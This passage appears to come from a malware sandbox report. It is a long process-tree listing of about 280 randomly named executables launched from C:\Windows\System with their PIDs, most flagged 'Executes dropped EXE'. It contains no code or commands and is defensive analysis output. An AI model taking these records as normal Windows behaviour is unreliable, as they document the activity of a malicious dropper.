  PID:5008
- C:\Windows\System\KTGlVSn.exe
  C:\Windows\System\KTGlVSn.exe
  2⤵
  - Executes dropped EXE
  PID:5116
- C:\Windows\System\eXIfBem.exe
  C:\Windows\System\eXIfBem.exe
  2⤵
  - Executes dropped EXE
  PID:4264
- C:\Windows\System\cQtrXHI.exe
  C:\Windows\System\cQtrXHI.exe
  2⤵
  - Executes dropped EXE
  PID:4596
- C:\Windows\System\epvyLis.exe
  C:\Windows\System\epvyLis.exe
  2⤵
  - Executes dropped EXE
  PID:4568
- C:\Windows\System\BZTgRTf.exe
  C:\Windows\System\BZTgRTf.exe
  2⤵
  - Executes dropped EXE
  PID:1716
- C:\Windows\System\ZCdlYUT.exe
  C:\Windows\System\ZCdlYUT.exe
  2⤵
  - Executes dropped EXE
  PID:2352
- C:\Windows\System\ZblOJuK.exe
  C:\Windows\System\ZblOJuK.exe
  2⤵
  - Executes dropped EXE
  PID:4284
- C:\Windows\System\dHsgnam.exe
  C:\Windows\System\dHsgnam.exe
  2⤵
  - Executes dropped EXE
  PID:1076
- C:\Windows\System\HyaRfxy.exe
  C:\Windows\System\HyaRfxy.exe
  2⤵
  - Executes dropped EXE
  PID:2764
- C:\Windows\System\gqTeRRr.exe
  C:\Windows\System\gqTeRRr.exe
  2⤵
  - Executes dropped EXE
  PID:2648
- C:\Windows\System\gkdeBlH.exe
  C:\Windows\System\gkdeBlH.exe
  2⤵
  - Executes dropped EXE
  PID:5092
- C:\Windows\System\aguuwrk.exe
  C:\Windows\System\aguuwrk.exe
  2⤵
  - Executes dropped EXE
  PID:3384
- C:\Windows\System\bsFvKBt.exe
  C:\Windows\System\bsFvKBt.exe
  2⤵
  - Executes dropped EXE
  PID:3364
- C:\Windows\System\PrbTwWR.exe
  C:\Windows\System\PrbTwWR.exe
  2⤵
  - Executes dropped EXE
  PID:3700
- C:\Windows\System\vjoopEt.exe
  C:\Windows\System\vjoopEt.exe
  2⤵
  - Executes dropped EXE
  PID:904
- C:\Windows\System\rbnOlWo.exe
  C:\Windows\System\rbnOlWo.exe
  2⤵
  - Executes dropped EXE
  PID:1080
- C:\Windows\System\SFcTSrS.exe
  C:\Windows\System\SFcTSrS.exe
  2⤵
  - Executes dropped EXE
  PID:4508
- C:\Windows\System\upnWatf.exe
  C:\Windows\System\upnWatf.exe
  2⤵
  - Executes dropped EXE
  PID:3864
- C:\Windows\System\hBoZtKT.exe
  C:\Windows\System\hBoZtKT.exe
  2⤵
  - Executes dropped EXE
  PID:4664
- C:\Windows\System\RCNMRwD.exe
  C:\Windows\System\RCNMRwD.exe
  2⤵
  - Executes dropped EXE
  PID:2896
- C:\Windows\System\TfhAgvF.exe
  C:\Windows\System\TfhAgvF.exe
  2⤵
  - Executes dropped EXE
  PID:2816
- C:\Windows\System\MnjaMhU.exe
  C:\Windows\System\MnjaMhU.exe
  2⤵
  - Executes dropped EXE
  PID:412
- C:\Windows\System\rAYxINr.exe
  C:\Windows\System\rAYxINr.exe
  2⤵
  - Executes dropped EXE
  PID:4472
- C:\Windows\System\xXvBqnv.exe
  C:\Windows\System\xXvBqnv.exe
  2⤵
  - Executes dropped EXE
  PID:3268
- C:\Windows\System\bhmojZv.exe
  C:\Windows\System\bhmojZv.exe
  2⤵
  - Executes dropped EXE
  PID:1428
- C:\Windows\System\PjQjZSK.exe
  C:\Windows\System\PjQjZSK.exe
  2⤵
  - Executes dropped EXE
  PID:2868
- C:\Windows\System\sSbLDKn.exe
  C:\Windows\System\sSbLDKn.exe
  2⤵
  - Executes dropped EXE
  PID:5072
- C:\Windows\System\ajzFbKq.exe
  C:\Windows\System\ajzFbKq.exe
  2⤵
  - Executes dropped EXE
  PID:1756
- C:\Windows\System\ZyIigON.exe
  C:\Windows\System\ZyIigON.exe
  2⤵
  - Executes dropped EXE
  PID:3936
- C:\Windows\System\xAUukZk.exe
  C:\Windows\System\xAUukZk.exe
  2⤵
  - Executes dropped EXE
  PID:1124
- C:\Windows\System\UTiCrUK.exe
  C:\Windows\System\UTiCrUK.exe
  2⤵
  - Executes dropped EXE
  PID:1580
- C:\Windows\System\varLakh.exe
  C:\Windows\System\varLakh.exe
  2⤵
  - Executes dropped EXE
  PID:3520
- C:\Windows\System\wvsRlxg.exe
  C:\Windows\System\wvsRlxg.exe
  2⤵
  - Executes dropped EXE
  PID:2880
- C:\Windows\System\chYLPSy.exe
  C:\Windows\System\chYLPSy.exe
  2⤵
  - Executes dropped EXE
  PID:2768
- C:\Windows\System\LQYkRlA.exe
  C:\Windows\System\LQYkRlA.exe
  2⤵
  - Executes dropped EXE
  PID:3960
- C:\Windows\System\Qleqily.exe
  C:\Windows\System\Qleqily.exe
  2⤵
  - Executes dropped EXE
  PID:3696
- C:\Windows\System\focZdzF.exe
  C:\Windows\System\focZdzF.exe
  2⤵
  - Executes dropped EXE
  PID:3704
- C:\Windows\System\AdwJPFd.exe
  C:\Windows\System\AdwJPFd.exe
  2⤵
  - Executes dropped EXE
  PID:1860
- C:\Windows\System\KzmgUiA.exe
  C:\Windows\System\KzmgUiA.exe
  2⤵
  - Executes dropped EXE
  PID:3472
- C:\Windows\System\iRpRFLd.exe
  C:\Windows\System\iRpRFLd.exe
  2⤵
  - Executes dropped EXE
  PID:1368
- C:\Windows\System\ONOYaaj.exe
  C:\Windows\System\ONOYaaj.exe
  2⤵
  - Executes dropped EXE
  PID:964
- C:\Windows\System\xesZOiy.exe
  C:\Windows\System\xesZOiy.exe
  2⤵
  PID:228
- C:\Windows\System\BVFAMCy.exe
  C:\Windows\System\BVFAMCy.exe
  2⤵
  - Executes dropped EXE
  PID:388
- C:\Windows\System\uFihrPo.exe
  C:\Windows\System\uFihrPo.exe
  2⤵
  - Executes dropped EXE
  PID:4040
- C:\Windows\System\LsEcJbD.exe
  C:\Windows\System\LsEcJbD.exe
  2⤵
  - Executes dropped EXE
  PID:4320
- C:\Windows\System\sUktBBO.exe
  C:\Windows\System\sUktBBO.exe
  2⤵
  - Executes dropped EXE
  PID:2784
- C:\Windows\System\cdeHPxz.exe
  C:\Windows\System\cdeHPxz.exe
  2⤵
  - Executes dropped EXE
  PID:3168
- C:\Windows\System\RdxPzWg.exe
  C:\Windows\System\RdxPzWg.exe
  2⤵
  - Executes dropped EXE
  PID:2640
- C:\Windows\System\xTOgqjN.exe
  C:\Windows\System\xTOgqjN.exe
  2⤵
  - Executes dropped EXE
  PID:648
- C:\Windows\System\JIplhEk.exe
  C:\Windows\System\JIplhEk.exe
  2⤵
  PID:3660
- C:\Windows\System\FhEkvlF.exe
  C:\Windows\System\FhEkvlF.exe
  2⤵
  PID:2796
- C:\Windows\System\GPSTTsb.exe
  C:\Windows\System\GPSTTsb.exe
  2⤵
  PID:3940
- C:\Windows\System\ZWUOlGZ.exe
  C:\Windows\System\ZWUOlGZ.exe
  2⤵
  PID:1960
- C:\Windows\System\mZpsFEp.exe
  C:\Windows\System\mZpsFEp.exe
  2⤵
  PID:4668
- C:\Windows\System\WCsArPX.exe
  C:\Windows\System\WCsArPX.exe
  2⤵
  PID:4528
- C:\Windows\System\FlNwgpd.exe
  C:\Windows\System\FlNwgpd.exe
  2⤵
  PID:2840
- C:\Windows\System\lSkolMb.exe
  C:\Windows\System\lSkolMb.exe
  2⤵
  PID:2312
- C:\Windows\System\TtuOPyU.exe
  C:\Windows\System\TtuOPyU.exe
  2⤵
  PID:3712
- C:\Windows\System\GWSydUA.exe
  C:\Windows\System\GWSydUA.exe
  2⤵
  PID:4704
- C:\Windows\System\qgXIAvN.exe
  C:\Windows\System\qgXIAvN.exe
  2⤵
  PID:1296
- C:\Windows\System\WUqvYuS.exe
  C:\Windows\System\WUqvYuS.exe
  2⤵
  PID:772
- C:\Windows\System\KSSkKkk.exe
  C:\Windows\System\KSSkKkk.exe
  2⤵
  PID:216
- C:\Windows\System\eolZQxW.exe
  C:\Windows\System\eolZQxW.exe
  2⤵
  PID:3816
- C:\Windows\System\rRRPItx.exe
  C:\Windows\System\rRRPItx.exe
  2⤵
  PID:4200
- C:\Windows\System\rwbjvMD.exe
  C:\Windows\System\rwbjvMD.exe
  2⤵
  PID:5140
- C:\Windows\System\NPfOJYq.exe
  C:\Windows\System\NPfOJYq.exe
  2⤵
  PID:5160
- C:\Windows\System\yAFUAMN.exe
  C:\Windows\System\yAFUAMN.exe
  2⤵
  PID:5180
- C:\Windows\System\qptZzRb.exe
  C:\Windows\System\qptZzRb.exe
  2⤵
  PID:5196
- C:\Windows\System\KYfZoyc.exe
  C:\Windows\System\KYfZoyc.exe
  2⤵
  PID:5216
- C:\Windows\System\bdqMSnu.exe
  C:\Windows\System\bdqMSnu.exe
  2⤵
  PID:5296
- C:\Windows\System\KTPwWxc.exe
  C:\Windows\System\KTPwWxc.exe
  2⤵
  PID:5316
- C:\Windows\System\safwFUi.exe
  C:\Windows\System\safwFUi.exe
  2⤵
  PID:5332
- C:\Windows\System\LUUjocR.exe
  C:\Windows\System\LUUjocR.exe
  2⤵
  PID:5356
- C:\Windows\System\WLFtqpa.exe
  C:\Windows\System\WLFtqpa.exe
  2⤵
  PID:5372
- C:\Windows\System\sVzAszB.exe
  C:\Windows\System\sVzAszB.exe
  2⤵
  PID:5392
- C:\Windows\System\GxazYTY.exe
  C:\Windows\System\GxazYTY.exe
  2⤵
  PID:5412
- C:\Windows\System\WdelMqT.exe
  C:\Windows\System\WdelMqT.exe
  2⤵
  PID:5432
- C:\Windows\System\uqvcdRL.exe
  C:\Windows\System\uqvcdRL.exe
  2⤵
  PID:5476
- C:\Windows\System\iYCUKxj.exe
  C:\Windows\System\iYCUKxj.exe
  2⤵
  PID:5500
- C:\Windows\System\CtJJQoe.exe
  C:\Windows\System\CtJJQoe.exe
  2⤵
  PID:5524
- C:\Windows\System\NTLmHai.exe
  C:\Windows\System\NTLmHai.exe
  2⤵
  PID:5544
- C:\Windows\System\QPBZzuN.exe
  C:\Windows\System\QPBZzuN.exe
  2⤵
  PID:5560
- C:\Windows\System\FsWppXR.exe
  C:\Windows\System\FsWppXR.exe
  2⤵
  PID:5588
- C:\Windows\System\keacOKU.exe
  C:\Windows\System\keacOKU.exe
  2⤵
  PID:5604
- C:\Windows\System\uijYwDH.exe
  C:\Windows\System\uijYwDH.exe
  2⤵
  PID:5620
- C:\Windows\System\TMNWaWK.exe
  C:\Windows\System\TMNWaWK.exe
  2⤵
  PID:5652
- C:\Windows\System\edInyzu.exe
  C:\Windows\System\edInyzu.exe
  2⤵
  PID:5676
- C:\Windows\System\sbSOrwZ.exe
  C:\Windows\System\sbSOrwZ.exe
  2⤵
  PID:5696
- C:\Windows\System\ZtWigiQ.exe
  C:\Windows\System\ZtWigiQ.exe
  2⤵
  PID:5716
- C:\Windows\System\uTzYUBs.exe
  C:\Windows\System\uTzYUBs.exe
  2⤵
  PID:5740
- C:\Windows\System\gFOuxPI.exe
  C:\Windows\System\gFOuxPI.exe
  2⤵
  PID:5756
- C:\Windows\System\EupTcpf.exe
  C:\Windows\System\EupTcpf.exe
  2⤵
  PID:5780
- C:\Windows\System\jsBVEVd.exe
  C:\Windows\System\jsBVEVd.exe
  2⤵
  PID:5796
- C:\Windows\System\CeHhFvi.exe
  C:\Windows\System\CeHhFvi.exe
  2⤵
  PID:5812
- C:\Windows\System\JdxLbLs.exe
  C:\Windows\System\JdxLbLs.exe
  2⤵
  PID:5836
- C:\Windows\System\EYUttiV.exe
  C:\Windows\System\EYUttiV.exe
  2⤵
  PID:5856
- C:\Windows\System\WcahPvJ.exe
  C:\Windows\System\WcahPvJ.exe
  2⤵
  PID:5876
- C:\Windows\System\MiEpUTA.exe
  C:\Windows\System\MiEpUTA.exe
  2⤵
  PID:5900
- C:\Windows\System\nNyQnAg.exe
  C:\Windows\System\nNyQnAg.exe
  2⤵
  PID:5920
- C:\Windows\System\cBhvHZj.exe
  C:\Windows\System\cBhvHZj.exe
  2⤵
  PID:5936
- C:\Windows\System\LGDHvhW.exe
  C:\Windows\System\LGDHvhW.exe
  2⤵
  PID:5960
- C:\Windows\System\iRdirhx.exe
  C:\Windows\System\iRdirhx.exe
  2⤵
  PID:5980
- C:\Windows\System\JBnpwMK.exe
  C:\Windows\System\JBnpwMK.exe
  2⤵
  PID:5996
- C:\Windows\System\nZdRRgH.exe
  C:\Windows\System\nZdRRgH.exe
  2⤵
  PID:6012
- C:\Windows\System\xtzFSkK.exe
  C:\Windows\System\xtzFSkK.exe
  2⤵
  PID:6032
- C:\Windows\System\XqBmDyN.exe
  C:\Windows\System\XqBmDyN.exe
  2⤵
  PID:6056
- C:\Windows\System\TUazjAF.exe
  C:\Windows\System\TUazjAF.exe
  2⤵
  PID:6076
- C:\Windows\System\UglnfmL.exe
  C:\Windows\System\UglnfmL.exe
  2⤵
  PID:6092
- C:\Windows\System\cCXBBKY.exe
  C:\Windows\System\cCXBBKY.exe
  2⤵
  PID:6116
- C:\Windows\System\RePDhTI.exe
  C:\Windows\System\RePDhTI.exe
  2⤵
  PID:6140
- C:\Windows\System\btIBFjy.exe
  C:\Windows\System\btIBFjy.exe
  2⤵
  PID:1620
- C:\Windows\System\aGaDqkb.exe
  C:\Windows\System\aGaDqkb.exe
  2⤵
  PID:3604
- C:\Windows\System\sVilAfy.exe
  C:\Windows\System\sVilAfy.exe
  2⤵
  PID:1748
- C:\Windows\System\kLpTdmR.exe
  C:\Windows\System\kLpTdmR.exe
  2⤵
  PID:468
- C:\Windows\System\KJEraMB.exe
  C:\Windows\System\KJEraMB.exe
  2⤵
  PID:208
- C:\Windows\System\heoOBPh.exe
  C:\Windows\System\heoOBPh.exe
  2⤵
  PID:264
- C:\Windows\System\EsSnteL.exe
  C:\Windows\System\EsSnteL.exe
  2⤵
  PID:3820
- C:\Windows\System\lpQNXJh.exe
  C:\Windows\System\lpQNXJh.exe
  2⤵
  PID:5136
- C:\Windows\System\rVSqgoJ.exe
  C:\Windows\System\rVSqgoJ.exe
  2⤵
  PID:2464
- C:\Windows\System\uyGIGva.exe
  C:\Windows\System\uyGIGva.exe
  2⤵
  PID:3480
- C:\Windows\System\RITXpcm.exe
  C:\Windows\System\RITXpcm.exe
  2⤵
  PID:4292
- C:\Windows\System\VQdtiRb.exe
  C:\Windows\System\VQdtiRb.exe
  2⤵
  PID:5052
- C:\Windows\System\ttwfvJa.exe
  C:\Windows\System\ttwfvJa.exe
  2⤵
  PID:2188
- C:\Windows\System\fFEbkoJ.exe
  C:\Windows\System\fFEbkoJ.exe
  2⤵
  PID:4640
- C:\Windows\System\NnBRKvc.exe
  C:\Windows\System\NnBRKvc.exe
  2⤵
  PID:5172
- C:\Windows\System\FtfDSpC.exe
  C:\Windows\System\FtfDSpC.exe
  2⤵
  PID:5192
- C:\Windows\System\btNrVNo.exe
  C:\Windows\System\btNrVNo.exe
  2⤵
  PID:920
- C:\Windows\System\XaxPHXi.exe
  C:\Windows\System\XaxPHXi.exe
  2⤵
  PID:6160
- C:\Windows\System\BcKemDW.exe
  C:\Windows\System\BcKemDW.exe
  2⤵
  PID:6176
- C:\Windows\System\WNgzFOX.exe
  C:\Windows\System\WNgzFOX.exe
  2⤵
  PID:6200
- C:\Windows\System\amloQto.exe
  C:\Windows\System\amloQto.exe
  2⤵
  PID:6216
- C:\Windows\System\LFtQRRR.exe
  C:\Windows\System\LFtQRRR.exe
  2⤵
  PID:6240
- C:\Windows\System\mUdkrYt.exe
  C:\Windows\System\mUdkrYt.exe
  2⤵
  PID:6260
- C:\Windows\System\JMcDCDA.exe
  C:\Windows\System\JMcDCDA.exe
  2⤵
  PID:6280
- C:\Windows\System\HeatBvp.exe
  C:\Windows\System\HeatBvp.exe
  2⤵
  PID:6296
- C:\Windows\System\metHcmQ.exe
  C:\Windows\System\metHcmQ.exe
  2⤵
  PID:6324
- C:\Windows\System\DCLkXFs.exe
  C:\Windows\System\DCLkXFs.exe
  2⤵
  PID:6348
- C:\Windows\System\vTSQOZC.exe
  C:\Windows\System\vTSQOZC.exe
  2⤵
  PID:6364
- C:\Windows\System\xjboLIF.exe
  C:\Windows\System\xjboLIF.exe
  2⤵
  PID:6392
- C:\Windows\System\uGXBHUQ.exe
  C:\Windows\System\uGXBHUQ.exe
  2⤵
  PID:6408
- C:\Windows\System\zUviyja.exe
  C:\Windows\System\zUviyja.exe
  2⤵
  PID:6424
- C:\Windows\System\RqERMGQ.exe
  C:\Windows\System\RqERMGQ.exe
  2⤵
  PID:6444
- C:\Windows\System\OVhgAPj.exe
  C:\Windows\System\OVhgAPj.exe
  2⤵
  PID:6460
- C:\Windows\System\uMbTOBi.exe
  C:\Windows\System\uMbTOBi.exe
  2⤵
  PID:6512
- C:\Windows\System\odLpqrU.exe
  C:\Windows\System\odLpqrU.exe
  2⤵
  PID:6540
- C:\Windows\System\FmKTlGQ.exe
  C:\Windows\System\FmKTlGQ.exe
  2⤵
  PID:6556
- C:\Windows\System\nxbwuYZ.exe
  C:\Windows\System\nxbwuYZ.exe
  2⤵
  PID:6584
- C:\Windows\System\kkhWVef.exe
  C:\Windows\System\kkhWVef.exe
  2⤵
  PID:6600
- C:\Windows\System\grcPcCu.exe
  C:\Windows\System\grcPcCu.exe
  2⤵
  PID:6632
- C:\Windows\System\OooiOsg.exe
  C:\Windows\System\OooiOsg.exe
  2⤵
  PID:6656
- C:\Windows\System\huSGBnY.exe
  C:\Windows\System\huSGBnY.exe
  2⤵
  PID:6676
- C:\Windows\System\VBAyXMl.exe
  C:\Windows\System\VBAyXMl.exe
  2⤵
  PID:6696
- C:\Windows\System\MVTNINf.exe
  C:\Windows\System\MVTNINf.exe
  2⤵
  PID:6720
- C:\Windows\System\vhxokMT.exe
  C:\Windows\System\vhxokMT.exe
  2⤵
  PID:6736
- C:\Windows\System\eWXYLsH.exe
  C:\Windows\System\eWXYLsH.exe
  2⤵
  PID:6760
- C:\Windows\System\uoxCzpX.exe
  C:\Windows\System\uoxCzpX.exe
  2⤵
  PID:6776
- C:\Windows\System\sIhnUvi.exe
  C:\Windows\System\sIhnUvi.exe
  2⤵
  PID:6800
- C:\Windows\System\UDmXlOo.exe
  C:\Windows\System\UDmXlOo.exe
  2⤵
  PID:6816
- C:\Windows\System\dmKHRLc.exe
  C:\Windows\System\dmKHRLc.exe
  2⤵
  PID:6836
- C:\Windows\System\zsoLZAm.exe
  C:\Windows\System\zsoLZAm.exe
  2⤵
  PID:6952
- C:\Windows\System\IBdjAPy.exe
  C:\Windows\System\IBdjAPy.exe
  2⤵
  PID:6968
- C:\Windows\System\ShHpOvQ.exe
  C:\Windows\System\ShHpOvQ.exe
  2⤵
  PID:6984
- C:\Windows\System\koPEWam.exe
  C:\Windows\System\koPEWam.exe
  2⤵
  PID:7008
- C:\Windows\System\xxJFhGL.exe
  C:\Windows\System\xxJFhGL.exe
  2⤵
  PID:7032
- C:\Windows\System\mmZIavk.exe
  C:\Windows\System\mmZIavk.exe
  2⤵
  PID:7048
- C:\Windows\System\xgLcQWx.exe
  C:\Windows\System\xgLcQWx.exe
  2⤵
  PID:7084
- C:\Windows\System\QesfTIq.exe
  C:\Windows\System\QesfTIq.exe
  2⤵
  PID:7112
- C:\Windows\System\qqlvqTL.exe
  C:\Windows\System\qqlvqTL.exe
  2⤵
  PID:7128
- C:\Windows\System\nQQvMjd.exe
  C:\Windows\System\nQQvMjd.exe
  2⤵
  PID:7152
- C:\Windows\System\uVGOsyZ.exe
  C:\Windows\System\uVGOsyZ.exe
  2⤵
  PID:224
- C:\Windows\System\cGalitp.exe
  C:\Windows\System\cGalitp.exe
  2⤵
  PID:4328
- C:\Windows\System\feBVNGC.exe
  C:\Windows\System\feBVNGC.exe
  2⤵
  PID:4052
- C:\Windows\System\yZNaxUd.exe
  C:\Windows\System\yZNaxUd.exe
  2⤵
  PID:4544
- C:\Windows\System\rnXAfGU.exe
  C:\Windows\System\rnXAfGU.exe
  2⤵
  PID:2956
- C:\Windows\System\eKYAtSl.exe
  C:\Windows\System\eKYAtSl.exe
  2⤵
  PID:2572
- C:\Windows\System\iUrWVRg.exe
  C:\Windows\System\iUrWVRg.exe
  2⤵
  PID:5324
- C:\Windows\System\jSuOpEr.exe
  C:\Windows\System\jSuOpEr.exe
  2⤵
  PID:5344
- C:\Windows\System\ajswVAD.exe
  C:\Windows\System\ajswVAD.exe
  2⤵
  PID:5892
- C:\Windows\System\RbLlZOv.exe
  C:\Windows\System\RbLlZOv.exe
  2⤵
  PID:5388
- C:\Windows\System\BBMOBoy.exe
  C:\Windows\System\BBMOBoy.exe
  2⤵
  PID:5976
- C:\Windows\System\IcKvJVe.exe
  C:\Windows\System\IcKvJVe.exe
  2⤵
  PID:6024
- C:\Windows\System\oJzTgog.exe
  C:\Windows\System\oJzTgog.exe
  2⤵
  PID:5232
- C:\Windows\System\xkaaiba.exe
  C:\Windows\System\xkaaiba.exe
  2⤵
  PID:5280
- C:\Windows\System\IdJXhVV.exe
  C:\Windows\System\IdJXhVV.exe
  2⤵
  PID:5752
- C:\Windows\System\ZJzWkOR.exe
  C:\Windows\System\ZJzWkOR.exe
  2⤵
  PID:6564
- C:\Windows\System\ydeiabH.exe
  C:\Windows\System\ydeiabH.exe
  2⤵
  PID:5844
- C:\Windows\System\uttmJBO.exe
  C:\Windows\System\uttmJBO.exe
  2⤵
  PID:5928
- C:\Windows\System\zNDyqXY.exe
  C:\Windows\System\zNDyqXY.exe
  2⤵
  PID:6672
- C:\Windows\System\vMGSgXg.exe
  C:\Windows\System\vMGSgXg.exe
  2⤵
  PID:5456
- C:\Windows\System\NMdOdvP.exe
  C:\Windows\System\NMdOdvP.exe
  2⤵
  PID:5496
- C:\Windows\System\jbKOEZS.exe
  C:\Windows\System\jbKOEZS.exe
  2⤵
  PID:5600
- C:\Windows\System\FdNhLpr.exe
  C:\Windows\System\FdNhLpr.exe
  2⤵
  PID:5660
- C:\Windows\System\DJViYcE.exe
  C:\Windows\System\DJViYcE.exe
  2⤵
  PID:5692
- C:\Windows\System\xlADhQR.exe
  C:\Windows\System\xlADhQR.exe
  2⤵
  PID:5748
- C:\Windows\System\ENDrBFJ.exe
  C:\Windows\System\ENDrBFJ.exe
  2⤵
  PID:7184
- C:\Windows\System\LNNsszq.exe
  C:\Windows\System\LNNsszq.exe
  2⤵
  PID:7204
- C:\Windows\System\DrbWCKb.exe
  C:\Windows\System\DrbWCKb.exe
  2⤵
  PID:7220
- C:\Windows\System\sTjopaV.exe
  C:\Windows\System\sTjopaV.exe
  2⤵
  PID:7248
- C:\Windows\System\otKIadx.exe
  C:\Windows\System\otKIadx.exe
  2⤵
  PID:7268
- C:\Windows\System\qsOxHAO.exe
  C:\Windows\System\qsOxHAO.exe
  2⤵
  PID:7288
- C:\Windows\System\InfvFXx.exe
  C:\Windows\System\InfvFXx.exe
  2⤵
  PID:7312
- C:\Windows\System\ygeRvIz.exe
  C:\Windows\System\ygeRvIz.exe
  2⤵
  PID:7336
- C:\Windows\System\gwfDCmF.exe
  C:\Windows\System\gwfDCmF.exe
  2⤵
  PID:7352
- C:\Windows\System\SiCjony.exe
  C:\Windows\System\SiCjony.exe
  2⤵
  PID:7372
- C:\Windows\System\PUPxIHy.exe
  C:\Windows\System\PUPxIHy.exe
  2⤵
  PID:7396
- C:\Windows\System\pNbUFsU.exe
  C:\Windows\System\pNbUFsU.exe
  2⤵
  PID:7416
- C:\Windows\System\JpeRBcf.exe
  C:\Windows\System\JpeRBcf.exe
  2⤵
  PID:7436
- C:\Windows\System\RBnjFyn.exe
  C:\Windows\System\RBnjFyn.exe
  2⤵
  PID:7464
- C:\Windows\System\vGEZkhW.exe
  C:\Windows\System\vGEZkhW.exe
  2⤵
  PID:7480
- C:\Windows\System\sjysjxM.exe
  C:\Windows\System\sjysjxM.exe
  2⤵
  PID:7508
- C:\Windows\System\LQYRLol.exe
  C:\Windows\System\LQYRLol.exe
  2⤵
  PID:7524
- C:\Windows\System\IjRAigy.exe
  C:\Windows\System\IjRAigy.exe
  2⤵
  PID:7548
- C:\Windows\System\YOgBsRW.exe
  C:\Windows\System\YOgBsRW.exe
  2⤵
  PID:7568
- C:\Windows\System\RQpuYDJ.exe
  C:\Windows\System\RQpuYDJ.exe
  2⤵
  PID:7588
- C:\Windows\System\hDwhnkB.exe
  C:\Windows\System\hDwhnkB.exe
  2⤵
  PID:7604
- C:\Windows\System\FcJsIHe.exe
  C:\Windows\System\FcJsIHe.exe
  2⤵
  PID:7620
- C:\Windows\System\eVWdSit.exe
  C:\Windows\System\eVWdSit.exe
  2⤵
  PID:7636
- C:\Windows\System\KISLgLH.exe
  C:\Windows\System\KISLgLH.exe
  2⤵
  PID:7660
- C:\Windows\System\SZYtxoj.exe
  C:\Windows\System\SZYtxoj.exe
  2⤵
  PID:7684
- C:\Windows\System\lfiCpme.exe
  C:\Windows\System\lfiCpme.exe
  2⤵
  PID:7704
- C:\Windows\System\LiFjItZ.exe
  C:\Windows\System\LiFjItZ.exe
  2⤵
  PID:7732
- C:\Windows\System\tknXarM.exe
  C:\Windows\System\tknXarM.exe
  2⤵
  PID:7748
- C:\Windows\System\CzHJNoA.exe
  C:\Windows\System\CzHJNoA.exe
  2⤵
  PID:7772
- C:\Windows\System\AJHfhGp.exe
  C:\Windows\System\AJHfhGp.exe
  2⤵
  PID:7792
- C:\Windows\System\KRSoDZh.exe
  C:\Windows\System\KRSoDZh.exe
  2⤵
  PID:7816
- C:\Windows\System\TRpEQWg.exe
  C:\Windows\System\TRpEQWg.exe
  2⤵
  PID:7832
- C:\Windows\System\XILltEB.exe
  C:\Windows\System\XILltEB.exe
  2⤵
  PID:7852
- C:\Windows\System\uRuDSxR.exe
  C:\Windows\System\uRuDSxR.exe
  2⤵
  PID:7868
- C:\Windows\System\WXejRZH.exe
  C:\Windows\System\WXejRZH.exe
  2⤵
  PID:7884
- C:\Windows\System\rernslY.exe
  C:\Windows\System\rernslY.exe
  2⤵
  PID:7940
- C:\Windows\System\vWjyreu.exe
  C:\Windows\System\vWjyreu.exe
  2⤵
  PID:7964
- C:\Windows\System\iBQUerE.exe
  C:\Windows\System\iBQUerE.exe
  2⤵
  PID:7988
- C:\Windows\System\tsjeNFC.exe
  C:\Windows\System\tsjeNFC.exe
  2⤵
  PID:8004
- C:\Windows\System\QBicUxb.exe
  C:\Windows\System\QBicUxb.exe
  2⤵
  PID:8028
- C:\Windows\System\OVGFpSK.exe
  C:\Windows\System\OVGFpSK.exe
  2⤵
  PID:8048
- C:\Windows\System\VVabUYs.exe
  C:\Windows\System\VVabUYs.exe
  2⤵
  PID:8068
- C:\Windows\System\CbnotyQ.exe
  C:\Windows\System\CbnotyQ.exe
  2⤵
  PID:8096
- C:\Windows\System\YQAjHUT.exe
  C:\Windows\System\YQAjHUT.exe
  2⤵
  PID:8116
- C:\Windows\System\qpxQCPO.exe
  C:\Windows\System\qpxQCPO.exe
  2⤵
  PID:8136
- C:\Windows\System\kwnMAhx.exe
  C:\Windows\System\kwnMAhx.exe
  2⤵
  PID:8152
- C:\Windows\System\uzLkXku.exe
  C:\Windows\System\uzLkXku.exe
  2⤵
  PID:8176
- C:\Windows\System\aRBEUSy.exe
  C:\Windows\System\aRBEUSy.exe
  2⤵
  PID:1016
- C:\Windows\System\GTBKYAG.exe
  C:\Windows\System\GTBKYAG.exe
  2⤵
  PID:3000
- C:\Windows\System\MfkzcKz.exe
  C:\Windows\System\MfkzcKz.exe
  2⤵
  PID:4840
- C:\Windows\System\TiWGozr.exe
  C:\Windows\System\TiWGozr.exe
  2⤵
  PID:6708
- C:\Windows\System\wUkeTEj.exe
  C:\Windows\System\wUkeTEj.exe
  2⤵
  PID:5384
- C:\Windows\System\SDfWrrD.exe
  C:\Windows\System\SDfWrrD.exe
  2⤵
  PID:5568
- C:\Windows\System\YRctoWQ.exe
  C:\Windows\System\YRctoWQ.exe
  2⤵
  PID:6112
- C:\Windows\System\OfAadtv.exe
  C:\Windows\System\OfAadtv.exe
  2⤵
  PID:4380
- C:\Windows\System\UnnuKCI.exe
  C:\Windows\System\UnnuKCI.exe
  2⤵
  PID:4496
- C:\Windows\System\lKtBfNa.exe
  C:\Windows\System\lKtBfNa.exe
  2⤵
  PID:4068
- C:\Windows\System\PpCpXbv.exe
  C:\Windows\System\PpCpXbv.exe
  2⤵
  PID:5132
- C:\Windows\System\TGwGCft.exe
  C:\Windows\System\TGwGCft.exe
  2⤵
  PID:5204
- C:\Windows\System\MvIRlfn.exe
  C:\Windows\System\MvIRlfn.exe
  2⤵
  PID:4844
- C:\Windows\System\IvRKZQM.exe
  C:\Windows\System\IvRKZQM.exe
  2⤵
  PID:3116
- C:\Windows\System\BRoWnTW.exe
  C:\Windows\System\BRoWnTW.exe
  2⤵
  PID:5188
- C:\Windows\System\udSKMnN.exe
  C:\Windows\System\udSKMnN.exe
  2⤵
  PID:6156
- C:\Windows\System\vaIWFZB.exe
  C:\Windows\System\vaIWFZB.exe
  2⤵
  PID:6192
- C:\Windows\System\NexUWpK.exe
  C:\Windows\System\NexUWpK.exe
  2⤵
  PID:6236
- C:\Windows\System\sIHdyrv.exe
  C:\Windows\System\sIHdyrv.exe
  2⤵
  PID:6288
- C:\Windows\System\vvPLYob.exe
  C:\Windows\System\vvPLYob.exe
  2⤵
  PID:6332
- C:\Windows\System\GWPxRtF.exe
  C:\Windows\System\GWPxRtF.exe
  2⤵
  PID:3760
- C:\Windows\System\OTzHZOQ.exe
  C:\Windows\System\OTzHZOQ.exe
  2⤵
  PID:6416
- C:\Windows\System\UMrNxFG.exe
  C:\Windows\System\UMrNxFG.exe
  2⤵
  PID:6452
- C:\Windows\System\IpsKUza.exe
  C:\Windows\System\IpsKUza.exe
  2⤵
  PID:8204
- C:\Windows\System\GrhUgbV.exe
  C:\Windows\System\GrhUgbV.exe
  2⤵
  PID:8228
